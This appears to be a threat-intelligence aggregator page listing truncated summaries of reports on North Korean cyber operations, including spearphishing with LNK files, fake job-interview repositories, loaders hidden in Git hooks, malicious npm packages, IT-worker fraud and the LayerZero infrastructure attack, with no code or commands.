387 reports
Genians links this campaign to suspected APT37 activity, describing spearphishing emails that deliver ZIP archives containing malicious LNK files. The lures include airline e-tickets, North Korea research event invitations, and impersonation of defense or…
Genians links this campaign to suspected APT37 activity using spear-phishing emails that deliver ZIP archives containing malicious LNK files. The lures included airline e-ticket confirmations, North Korea research event invitations, and impersonation of d…
LayerZero said the Lazarus Group attacked internal RPCs used by the LayerZero Labs DVN and poisoned their source of truth while an external RPC provider was simultaneously DDoS’d. The protocol itself was described as unaffected, but the incident impacted …
CSIS argues that North Korean cyber operations, alongside activity from China and Russia, are creating a transnational threat environment that current U.S.-ROK cyber cooperation is not yet structured to deter or withstand. The core recommendation is a joi…
Nisos links DPRK IT worker employment fraud to active targeting of cryptocurrency companies, using a suspected operative who applied for a remote Lead AI Architect role as a case study. The investigation tied the applicant to stolen or appropriated U.S. i…
The episode follows a DPRK-linked fake interview in which a malicious contractor-style repository behaved like normal development work until it contacted attacker infrastructure. The lure depended on developer trust in workspaces, dependency installation,…
Red Asgard ties the Hetzner host at 195.201.104.53 to more than BeaverTail FTP exfiltration, showing it also exposed six Express.js services on non-standard ports. Port 21 ran FileZilla Server 1.12.1 with TLS session resumption enforced and held seventy v…
Two U.S. nationals helped DPRK remote IT workers pose as U.S.-based employees by receiving company laptops, hosting them at their residences, and installing remote desktop software for overseas co-conspirators. The Justice Department said the separate sch…
Attackers exploited LayerZero Labs infrastructure on 18 April 2026, causing more than $300 million in losses across DeFi protocols and prompting two additional forged transactions totaling over $100 million before Kelp paused contracts. The excerpt says i…
ScarCruft compromised a Yanbian-focused gaming platform in a supply-chain attack aimed at ethnic Koreans in China's Yanbian region, an area linked to North Korean refugees and defectors. The Windows client was affected through a malicious update that led …
OpenSourceMalware reports that DPRK Contagious Interview and TaskJacker operators are hiding a second-stage loader inside Git pre-commit hooks instead of prior locations such as VS Code tasks, package postinstall scripts, or fake font files. The hook fing…
Aave LLC’s court filing seeks to vacate a restraining notice served on Arbitrum DAO in litigation involving plaintiffs against the Democratic People’s Republic of Korea. The memorandum says the restrained assets relate to the rsETH Incident and the April …
A five-package npm cluster used Cloudflare Pages and Workers infrastructure to deliver PylangGhost RAT. The packages shared related maintainer names, email patterns, publish timing, and dependency links, leading the source to assess they were likely opera…
Plausible Deniability pivots from Team Cymru's reporting on DPRK IT worker infrastructure to identify a possible related Luckyguys cluster centered on luckyguys[.]cloud. The domain was registered close to luckyguys[.]site through the same registrar, hoste…
DomainTools characterizes DPRK Contagious Interview activity as a Lazarus developer-workflow compromise model that turns fake recruiting and coding assessments into initial access. Victims are pushed to clone and run repositories that hide malicious logic…